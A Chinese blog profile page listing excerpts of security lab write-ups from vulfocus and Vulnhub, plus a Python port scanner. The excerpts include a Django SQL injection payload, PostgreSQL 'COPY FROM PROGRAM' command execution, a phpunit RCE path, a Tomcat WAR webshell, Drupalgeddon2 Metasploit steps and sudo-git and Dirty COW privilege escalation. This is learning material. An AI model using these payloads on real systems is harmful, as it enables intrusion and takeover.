自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(10)
  • 问答 (1)
  • 收藏
  • 关注

原创 vulfocus Django SQL注入漏洞(CVE-2019-14234)

打开网址 访问/admin 后台登陆后访问/admin/vuln/collection/poc:http://your-ip:8000/admin/vuln/collection/?detail__a%27b=123http://ip:8000/admin/vuln/collection/?detail__title')%3d'1' or 1%3d1 %3bcreate table cmd_exec(cmd_output text)--%20得到flag...

2021-08-25 10:08:13 825

原创 vuflocus postgresql 命令执行 (cve-2019-9193)

连接数据库psql --host ip -p port --username账号:postgres密码:postgres输入命令:DROP TABLE IF EXISTS cmd_exec #执行删除你想用来保存命令输出但是可能存在的表 CREATE TABLE cmd_exec(cmd_output text) #创建保存输出的表COPY cmd_exec FROM PROGRAM ls /tmp' #执行系统命令SELECT * FROM cmd_exec

2021-08-24 17:33:48 255

原创 vulfocus:typesetter 文件上传

管理员账号密码登入点击已上传的档案上传木马文件(zip文件)解压点击2.php得到路径 蚁剑连接得到flag

2021-08-24 10:42:07 205

原创 Vulfocus phpunit远程代码执行

phpunit 远程代码执行 (CVE-2017-9841)打开靶场访问存在漏洞的urlIp/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php抓包改包 提交为POST数据 并添加执行phpinfo的代码执行可得到flag

2021-08-18 09:34:10 415

原创 vulfcous学习-tomcat-pass-getshell 弱口令

vulfcous学习-tomcat-pass-getshell 弱口令打开靶机地址 尝试登陆 manager APP后台 tomcat/tomcat制作war包 将jsp大马压缩为zip再更改后缀为war访问 靶机url/压缩文件名/大马文件名.jsp输入密码进入文件系统输入/tmp得到flag...

2021-07-20 10:32:50 346 1

原创 Vulnhub 学习—DC-2

首先 在/etc/host中添加靶机IP和域名浏览器访问得到flag1flag1提示用cewl字典生成器ewl -w /tmp/passwd.txt http://dc-2/wpscan扫描得到三个用户名将三个用户名放入一个文件中再使用wpscan破解密码ssh建立连接绕过受限shellecho $?为0 成功拿到flag3根据flag3提示切换用户为jerry得到flag4根据提示git提权sudo git -p help在最后一行写入!/bin/bash切换到root得到最后

2021-04-27 13:58:40 67

原创 Vulnhub 学习—DC-1

Zenmap进行主机发现并扫描发现80,22端口开放访问网址,发现CMS版本msf搜索漏洞search Drupaluse exploit/unix/webapp/drupal_drupalgeddon2show optionsset RHOSTS 靶机地址set LHOSTS 主机地址run漏洞利用成功,获取flag1根据flag1的提示找到drupal的配置文件得到数据库的账号密码shellpython -c 'import pty; pty.spawn("/bin/bash")'

2021-04-27 10:16:06 125

原创 vulnhub学习-My File Server: 1

打开靶机 neidiscover进行主机发现nmap nikto进行扫描 发现readme.txt访问一下得到密码但不知到是哪个服务的试下ftp匿名登陆发现下面有一些文件,用smbmap枚举目录发现smbdata有读和写的权限登陆smbdata,把sshd_config和secure get下来在source下找到用户名和密码再用用户名和一开始的密码登陆ftp尝试登陆ssh因为有密钥所以先伪造密钥再通过ftp将伪造的密钥上传 成功登陆sshunmae -a查看版本内核使用脏牛提权

2021-04-25 15:38:31 157

原创 Vulnhub学习-TOOPO

打开虚拟机得到IP地址nmap进行端口扫描这里发现22端口开放可以进行远程连接可进行暴力破解打开这个网站,发现是一个博客网站,扫一下它的目录发现关键词admin直接访问发现一个txt文件打开它12345ted123ssh登陆(密码自己想) 登陆成功find过滤掉无权限查看的文件...

2021-04-25 13:11:09 152

原创 Python网络编程

python编写的扫描端口工具import socket,sysport=[135,149,445,1433,3306,3389,1521]#常用端口def open(ip,port): s=socket.socket() #创建并返回socket对象 s.connect((ip,port)) #将socket连接到一个主机上 try: s.connect((ip,

2020-10-15 21:52:07 114

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除